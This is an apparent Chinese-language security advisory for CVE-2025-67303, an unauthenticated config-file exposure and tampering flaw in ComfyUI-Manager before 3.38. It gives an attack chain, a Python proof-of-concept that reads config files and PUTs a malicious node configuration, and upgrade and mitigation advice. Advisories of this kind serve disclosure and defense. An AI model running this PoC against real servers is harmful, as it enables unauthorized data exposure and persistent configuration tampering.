CVE-2025-67303 ComfyUI-Manager 路径遍历导致配置数据泄露

漏洞信息

漏洞编号

CVE-2025-67303

漏洞类型

路径遍历/不安全的文件存储/配置注入

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ComfyUI-Manager

漏洞概述

CVE-2025-67303是ComfyUI-Manager在3.38版本之前存在的一个高危安全漏洞。该漏洞允许远程攻击者通过网络访问应用的不安全存储位置，从而操纵配置文件和关键数据。由于应用程序将敏感文件存储在Web服务器可访问的目录中，攻击者无需任何认证即可直接通过HTTP请求访问、读取甚至修改这些文件。此漏洞的CVSS评分为7.5，属于高危级别，主要威胁系统的完整性。攻击者可以利用此漏洞修改应用配置、执行恶意操作或获取敏感信息，对使用ComfyUI-Manager的系统造成严重安全风险。

技术细节

漏洞根源在于ComfyUI-Manager将应用文件存储在Web服务器可访问的路径中，攻击者可以通过构造特定的HTTP请求直接访问存储目录。攻击者利用路径遍历技术（如使用../等相对路径）在Web接口中导航到配置文件目录。由于应用未对存储路径实施适当的访问控制，攻击者能够读取配置文件内容获取敏感信息，甚至可以写入恶意配置数据。攻击过程无需任何认证凭证，利用网络可达性即可实施攻击。攻击者首先识别Web服务器上ComfyUI-Manager的存储路径，然后通过HTTP请求直接访问配置文件，利用文件内容获取进一步攻击的筹码或直接修改配置以实现持久化控制。

攻击链分析

STEP 1

步骤1

攻击者扫描目标服务器，识别运行中的ComfyUI-Manager实例及其Web服务端口

STEP 2

步骤2

攻击者通过HTTP请求探测ComfyUI-Manager的存储路径，发现/userdata等可访问目录

STEP 3

步骤3

攻击者利用路径遍历或直接访问，读取配置文件获取敏感信息和系统配置

STEP 4

步骤4

攻击者构造恶意配置数据，通过PUT/POST请求写入被污染的配置文件

STEP 5

步骤5

修改后的配置在应用重启或下次加载时被应用，攻击者实现持久化控制或进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-67303 PoC - ComfyUI-Manager Path Traversal
# Target: ComfyUI-Manager < v3.38
# This PoC demonstrates accessing config files via web interface

import requests
import sys

TARGET_URL = "http://target-server:8181"
COMFYUI_MANAGER_PATH = "/userdata"  # Insecure storage path

def check_vulnerability():
    """Check if target is vulnerable to CVE-2025-67303"""
    # Try to access the manager's config directory
    paths_to_check = [
        f"{COMFYUI_MANAGER_PATH}/config.json",
        f"{COMFYUI_MANAGER_PATH}/manager_config.json",
        f"{COMFYUI_MANAGER_PATH}/custom-node-list.json"
    ]
    
    vulnerable = False
    for path in paths_to_check:
        try:
            response = requests.get(f"{TARGET_URL}{path}", timeout=10)
            if response.status_code == 200:
                print(f"[+] Found accessible file: {path}")
                print(f"[+] Content preview: {response.text[:200]}...")
                vulnerable = True
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {path}: {e}")
    
    return vulnerable

def exploit_config_manipulation():
    """Attempt to modify configuration via PUT request"""
    malicious_config = '{"custom_nodes": ["malicious_node"], "enabled": true}'
    
    try:
        response = requests.put(
            f"{TARGET_URL}{COMFYUI_MANAGER_PATH}/manager_config.json",
            data=malicious_config,
            headers={"Content-Type": "application/json"},
            timeout=10
        )
        if response.status_code in [200, 201, 204]:
            print("[+] Successfully modified configuration!")
            return True
    except requests.exceptions.RequestException:
        pass
    
    return False

if __name__ == "__main__":
    print("CVE-2025-67303 PoC - ComfyUI-Manager < v3.38")
    print("=" * 50)
    
    if check_vulnerability():
        print("\n[!] Target is VULNERABLE to CVE-2025-67303")
        print("[*] Attempting config manipulation...")
        exploit_config_manipulation()
    else:
        print("\n[-] Target appears to be patched or not accessible")

影响范围

ComfyUI-Manager < 3.38

防御指南

临时缓解措施

立即将ComfyUI-Manager升级到3.38版本，该版本已修复不安全的文件存储问题。同时，应检查并重新配置Web服务器权限，确保应用数据目录不能通过Web接口直接访问。对于无法立即升级的系统，建议将ComfyUI-Manager的userdata目录移动到Web根目录之外的隔离位置，并限制该目录的文件权限。